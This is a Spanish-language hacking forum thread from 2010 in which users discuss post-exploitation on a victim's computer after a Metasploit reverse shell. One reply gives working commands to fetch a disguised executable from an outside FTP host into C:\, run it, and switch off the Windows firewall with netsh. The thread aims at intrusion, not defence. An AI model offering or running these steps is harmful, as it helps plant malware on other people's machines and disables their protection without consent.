Subir y ejecutar exe en shell remota

Iniciado por illera88, 11 Noviembre 2010, 02:52 AM

0 Miembros y 1 Visitante están viendo este tema.

illera88

Pues eso es lo que estoy preguntando:
Consigo sin problemas una shell en metasploit haciendo un ataque en WAN. Utilizo el payload shell/reverse_tcp ya que el metetreper en el exploit que yo uso no tiene buenos resultados. Al caso, simplmente quiero una vez que ya tengo la shell subir y ejecutar un exe. He buscado pero no he encontrado exactamente el comando para hacerlo...

Alguien sabe como hacerlo???
Gracias ;);)

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Edu

Y podrias descargarle tu ejecutable desde FTP, entiendes?

illera88

#3
El video está muyu bien.... eso ya lo habia hecho pero lo que tengo es una shell. No la session de metetreper ya que tu usas el PAYLOAD de metetreper y yo el de shell/reverse_tcp...
Y claro el comando upload no está en la shell(consola msdos de toda la vida).

Lo que he pensado es que tiene que existir un comando para descargar un archivo por linea de comandos...
Algo como el wget de linux de toda la vida...
Entonces subiria el archivo a cualquier hosting que acepte exe y luego lo descargaría y ejecutaría por linea de comandos... Sabéis como se hace eso???
O lo que dice xxx-zero-xxx desde un ftp pero no se el comando para descargar nada desde la consola :S:S
Aver si alguien me lo dice.
Gracias

Edu

Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones
ftp ftp.webcindario.com   ( por ejemplo)
te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner:
dir   --> lista los archivos en tu ftp
get server.zip  C:\server.exe

Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye

y luego ejecutas el server.exe si es lo q querias hacer..



pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell:  %windir%\System32\netsh.exe firewall set opmode disable

illera88

Cita de: XXX-ZERO-XXX en 14 Noviembre 2010, 22:24 PM
Pero lo de la extensión lo arreglas subiendo al ftp el server.zip ( no comprimido sino solo cambiado la extensión), despues desde la shell pones
ftp ftp.webcindario.com   ( por ejemplo)
te pide para poner usuario, lo pones xD, y cuando pida la password no te asustes si no escribe nada solo escribela y dale a enter. Y despues q estas conectado podes poner:
dir   --> lista los archivos en tu ftp
get server.zip  C:\server.exe

Fijate como hice lo de el cambio de extensiones y despues esperas q lo descargue y luego sales del ftp poniendo el comando: bye

y luego ejecutas el server.exe si es lo q querias hacer..



pd: Pero claro q si usas ftp la pc victima tendra q abrir el puerto 21 pero podes desactivarle el firewall de windows por ejemplo en windows xp q es poniendo en la shell:  %windir%\System32\netsh.exe firewall set opmode disable


Muchas gracias por tu ayuda pero si ya necesito historias de andar abriendo puertos, desactivando firewalls... Se que lo del firewall no es más que un comando (suponiendo que usa el firewall de windows y no el del AV...) pero luego para abrir los puertos???
No se puede de la forma que te digo descargando directamente el archivo de un hosting (por ejemplo localhostr o el que sea...) y luego ya ejecutando el exe mediante linea de comandos???
Gracias de nuevo!!! ;-) ;-)

Edu

Pero si desactivas el firewall de windows no vas a necesitar abrir el puerto 21 ya q es como si estuvieran todos abiertos xD, claro.. si es q no usa router la victima porq sino tendria q abrirlo desde el router tamb pero como todo.. va siempre depende de la victima las cosas q tendras q hacer.

La verdad se me ocurren cosas si pero seria muy complicado, algo como crear un script linea por linea xD

illera88

joooodeeerrr... con lo facil que es con el metetreper....

Entonces no existe ningun comando para desgargar algo de una URL???
un saludo y gracias